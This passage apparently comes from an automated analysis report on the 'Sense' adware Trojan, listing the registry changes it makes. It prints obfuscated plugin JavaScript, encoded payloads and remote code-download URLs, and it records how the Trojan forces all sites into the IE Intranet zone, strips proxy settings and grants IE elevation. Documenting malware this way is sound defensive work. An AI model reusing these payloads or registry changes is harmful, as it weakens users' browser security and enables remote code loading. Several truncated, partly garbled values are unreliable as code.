"Name" = "engageya_inner_m"
[HKCU\Software\Sense\Plugins\42]
"Version" = "10"
[HKCU\Software\Sense\Plugins\207]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/207.js"
[HKCU\Software\Sense\Plugins\244]
"Version" = "5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Sense\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,269,93,102,123,180,184,191,192,220,221,223,226,239,242,244,262,263,281,91"
[HKCU\Software\Sense\Plugins\102]
"Name" = "dealply_m"
[HKCU\Software\Sense\Plugins\7]
"Version" = "2"
[HKCU\Software\Sense\Manifest]
"PublisherId" = "20891"
[HKCU\Software\Sense\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"
[HKCU\Software\Sense\Plugins\182]
"Name" = "openUrl"
[HKCU\Software\Sense\Plugins\180]
"Version" = "12"
[HKCU\Software\Sense\Plugins\182]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/182.js"
[HKCU\Software\Sense\Installer]
"FullVersion" = "1.34.8.12"
[HKCU\Software\Sense\Plugins\13]
"Version" = "7"
[HKCU\Software\Sense\Plugins\191]
"Version" = "7"
[HKCU\Software\Sense\Manifest]
"Description" = "."
[HKCU\Software\Sense\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;-"
[HKCU\Software\Sense\Plugins\191]
"Name" = "ciuvo_m"
[HKCU\Software\Sense\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn-"
[HKCU\Software\Sense\Installer]
"CodeDownloadDomain" = "http://js.loadgenclientservice.com"
[HKCU\Software\Sense\Plugins\46]
"Name" = "IETimers"
[HKCU\Software\Sense\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt䑃-"
[HKCU\Software\Sense\Plugins\220]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/220.js"
[HKCU\Software\Sense\Plugins\3]
"Version" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Sense\Plugins\269]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2ZjYzNTExZjFmMWMxMjNhMDIxODQ3NTA1MzU1MDMxYzE2MWY0YTViNGExYTBiNTkwNjExMDMwYzA0MWQxMzBmMDAwMzBhMWMxMTQxMTMxYjA4NDUxMjE0MWYwMTE0MGE1ZjFkMDA0NDE5MDQ1NDFhMGMwYjRkMmIzYTM4M2QzMzM0Mzc0MDQzN2E3ZDQ3MDIwNzAzMWIxYjM3MWQxYzU2NWY0YTUxMWYxZjFjMTIxYzRhNWI0YTA4NDAxOTUzMDY1MTAxNDI1YTE2MTkxZjU5MDMxZjAxMGIxZTVhMGIwZjA3NTgwYTBiMTYwNjA2MTE0YTAzMTY1OTAxMWI1ZDFkMWUxMDU4MzUyYzI1MjUyYzNkMzA1MjU4NmY2MzUxMDcwNzFkMDUwNjFlM2QwMTQ4NDk1NzU5NWU1YjY1MGQ=', 'tejswkhbop'); }"
[HKCU\Software\Sense\Plugins\28]
"Version" = "4"
[HKCU\Software\Sense\Plugins\246]
"JavaScript" = "var _0x79d9=[""\x6C\x65\x6E\x67\x74\x68""
[HKCU\Software\Sense\Plugins\41]
"Version" = "7"
[HKCU\Software\Sense\Plugins\21]
"Name" = "debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Sense\Plugins\226]
"Name" = "set_campaign_id_m"
[HKCU\Software\Sense\Plugins\43]
"Version" = "5"
[HKCU\Software\Sense\Plugins\239]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/239.js"
[HKCU\Software\Sense\Plugins\220]
"Version" = "22"
[HKCU\Software\Sense\Plugins\1]
"JavaScript" = "var __a0__=[""\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x39\x75\x36\x61\x32\x70\x36""
[HKCU\Software\Sense\Installer]
"Time" = "1411237378"
[HKCU\Software\Sense\Plugins\4]
"Name" = "jquery_1_7_1"
[HKCU\Software\Sense\Plugins\37]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/37.js"
[HKCU\Software\Sense\Plugins\281]
"Name" = "ibario_tier3_pops_m"
[HKCU\Software\Sense\Plugins\40]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/40.js"
[HKCU\Software\Sense\Plugins\180]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/180.js"
[HKCU\Software\Sense\Plugins\244]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2NDdlNTcxZTFhMGMxMzJmMDAxODRjNGQ1NTU0MDYwYzE3MGE0ODViNDExMjBkMDI1YzU2MDYxNDE1MTUwOTEyMGMxNzQwMWIwYzE3NWQwMzA3MTMxMjEzMWE1NzBhMTQxODExMGQwMzJhMDUxZTE5MTExMTVkMWQwMDFkMmEwNTFlMGEwODI1MDEwMDBmMDUwMTEzMWM1NjA5MDk0ZDA0MDcxMzQ4M2EzYTNkMTAzNTM2MzU1ZjM4MzEyNzFkMzUwOTFkNDEzOTA0M2UwNjM4MmExYjU3MzUyNjM1NGI0NDMxNTAxZDBkMDExMzE2NDkzMTI4MzYyNDIxMmIzMDI4M2IzMDJiMjUyYTMzMzYyYzI2MzQzNjMxMmEyODI2MjMyYzI3MmEzZTJkMmI0ODE2MDUwNjAwMTkwZTFmNGYyYjMxMzQyNzM5M2QyYjMxMzMzNjMxM2MyODM0MjYzZTI3MmQzYjNmMzEzMTI4NTc1YTY0NzE0MTEyMDYwMDFlMDQyMDA0MDI1YTU5NWE1MDFjMWEwMzA1MDU1NDU3NGMxZjBhMDA1YzU5MTAxODA5MTkwNDFmMGIxNTQwMTQxYTFiNDEwZjBhMWUxNTExMWE1ODFjMTgwNDFkMDAwZTJkMDcxZTE2MDcxZDQxMTEwZDEwMmQwNzFlMDUxZTI5MWQwYzAyMDgwNjExMWM1OTFmMDU1MTA4MGExZTRmMzgzYTMyMDYzOTJhMzk1MjM1MzYyNTFkM2ExZjExNWQzNTA5MzMwMTNhMmExNDQxMzkzYTM5NDY0OTM2NTIxZDAyMTcxZjBhNDUzYzI1MzEyNjIxMjQyNjI0MjczYzI2MjgyZDMxMzYyMzMwMzgyYTNkMjcyNTIxMjEyYzI4M2MzMjMxMjc0NTFiMDIwNDAwMTYxODEzNTMyNzNjMzkyMDNiM2QyNDI3M2YyYTNkMzEyNTMzMjQzZTI4M2IzNzIzM2QïƒÂÂ-"
[HKCU\Software\Sense\Plugins\44]
"Version" = "6"
[HKCU\Software\Sense\Plugins\4]
"URL" = "http://js.loadgenclientservice.com/plugins/javascripts/jquery-1_7_1_min.js"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Sense\Plugins\191]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/191.js"
[HKCU\Software\Sense\Plugins\192]
"Version" = "9"
[HKCU\Software\Sense\Plugins\36]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/36.js"
[HKCU\Software\Sense\Plugins\207]
"Name" = "dbWrapper"
[HKCU\Software\Sense\Plugins\246]
"Name" = "setup"
[HKCU\Software\Sense\Plugins\93]
"Name" = "superfish_no_coupons_m"
[HKCU\Software\Sense\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\Sense\Installer]
"CodeDownloadFbDomain" = "http://js.clientdemocloud.com"
[HKCU\Software\Sense\Plugins\22]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/22.js"
[HKCU\Software\Sense\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"
[HKCU\Software\Sense\Plugins\239]
"Version" = "7"
[HKCU\Software\Sense\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjE"
[HKCU\Software\Sense\Plugins\91]
"JavaScript" = "(function(I){var x=[].slice;var w={};var a=function(ak){if(typeof ak==string&&typeof ak.trim==function){return ak.trim();}return ak==null?:ak.toString().replace(/^\s /,).replace(/\s $/,);};function f(ak){var al=w[ak]={},am,an;ak=ak.split(/\s /);for(am=0,an=ak.length;am
[HKCU\Software\Sense\Plugins\177]
"JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
[HKCU\Software\Sense\Manifest]
"DisableIe" = "true"
"IsButtonEnabled" = "false"
[HKCU\Software\Sense\Plugins\192]
"Name" = "revizer_ws_dynamic_b2b_m"
[HKCU\Software\Sense\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"
[HKCU\Software\Sense\Plugins\40]
"Name" = "IEExtension"
[HKCU\Software\Sense\Manifest]
"PluginsManifestVersion" = "17"
"UninstallerOfferAction" = "NA"
[HKCU\Software\Crossrider]
"Bic" = "2C8E11B2DAE94BCFA5FC713470AE08E4IE"
[HKCU\Software\Sense\Plugins\39]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/39.js"
[HKCU\Software\Sense\Plugins\64]
"Version" = "3"
[HKCU\Software\Sense\Plugins\183]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functiË."
[HKCU\Software\Sense\Plugins\3]
"Name" = "ie8_fix_2"
[HKCU\Software\Sense\Manifest]
"homepageurl" = "NA"
"EnableSearchIE" = "false"
[HKCU\Software\Sense\Plugins\37]
"Name" = "IEBrowserEvents"
[HKCU\Software\Sense\Manifest]
"ThanksUrl" = "NA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Sense\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se-"
[HKCU\Software\Sense\Installer]
"Params" = "{ source_id : 000803, sub_id : 0, uzid : 0"
[HKCU\Software\Sense\Plugins\46]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/46.js"
[HKCU\Software\Sense\Plugins\17]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/17.js"
[HKCU\Software\Sense\Plugins\64]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/64.js"
[HKCU\Software\Sense\Plugins\45]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/45.js"
[HKCU\Software\Sense\Plugins\102]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/102.js"0>0?0:>10?0>
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe:2568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 C5 45 80 A1 2D 28 B7 B3 1E 07 7F 09 52 A1 E6"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD7BF6E3-67C0-4DEC-9414-54B4FDE4BD83}]
"AppPath" = "%Program Files%\Sense"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{91F845-D61A-427A-B15C-1BB2BBCF33C1}]
"AppPath" = "%Program Files%\Sense"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{944F6B12-2BBE-456A-8DCB-1DA1876FC0AE}]
"Policy" = "3"
"AppPath" = "%Program Files%\Sense"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{91F845-D61A-427A-B15C-1BB2BBCF33C1}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD7BF6E3-67C0-4DEC-9414-54B4FDE4BD83}]
"AppName" = "a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe-codedownloader.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{944F6B12-2BBE-456A-8DCB-1DA1876FC0AE}]
"AppName" = "a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe-buttonutil.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{228FA0A2-7072-457F-A52-FC80B4C01743}]
"Policy" = "3"
"AppName" = "a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe-helper.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD7BF6E3-67C0-4DEC-9414-54B4FDE4BD83}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110611191115}" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110611191115}" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{91F845-D61A-427A-B15C-1BB2BBCF33C1}]
"AppName" = "a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe-buttonutil64.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{228FA0A2-7072-457F-A52-FC80B4C01743}]
"AppPath" = "%Program Files%\Sense"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"
The process Tkbjndnqomlxl.exe:2840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrPublisherId" = "20891"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"AppPath" = "%Program Files%\Sense"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"AppPath" = "%Program Files%\Sense"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrAppId" = "61915"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"Bic" = "2C8E11B2DAE94BCFA5FC713470AE08E4IE"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"AppName" = "Sense-bg.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"Sense-bg.exe" = "8000"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"srcid_var" = "000803"
[HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
"AuCheckPeriodMs" = "21600000"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"pv" = "1.3.25.0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Sense\Installer]
"BundledFirefox" = "1"
"BundledIe" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"UninstallString" = "%Program Files%\Sense\Uninstall.exe /fcp=1"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"Name" = "Object Browser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayName" = "Sense"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"Verifier" = "39aa73fdbfd54b44fad467ed5553801b"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Sense\Installer]
"BundledAddCh" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 AF E5 DB D6 01 01 6A CA D1 D7 BD 94 07 06 E3"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"AppName" = "Sense-bg.exe"
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayIcon" = "%Program Files%\Sense\utils.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"Publisher" = "Object Browser"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayVersion" = "1.34.8.12"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regsvr32.exe:2328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{44444444-4444-4444-4444-440644194415}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Sense"
[HKCR\Interface\{66666666-6666-6666-6666-660666196615}]
"(Default)" = "ISandBox"
[HKCR\Interface\{55555555-5555-5555-5555-550655195515}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
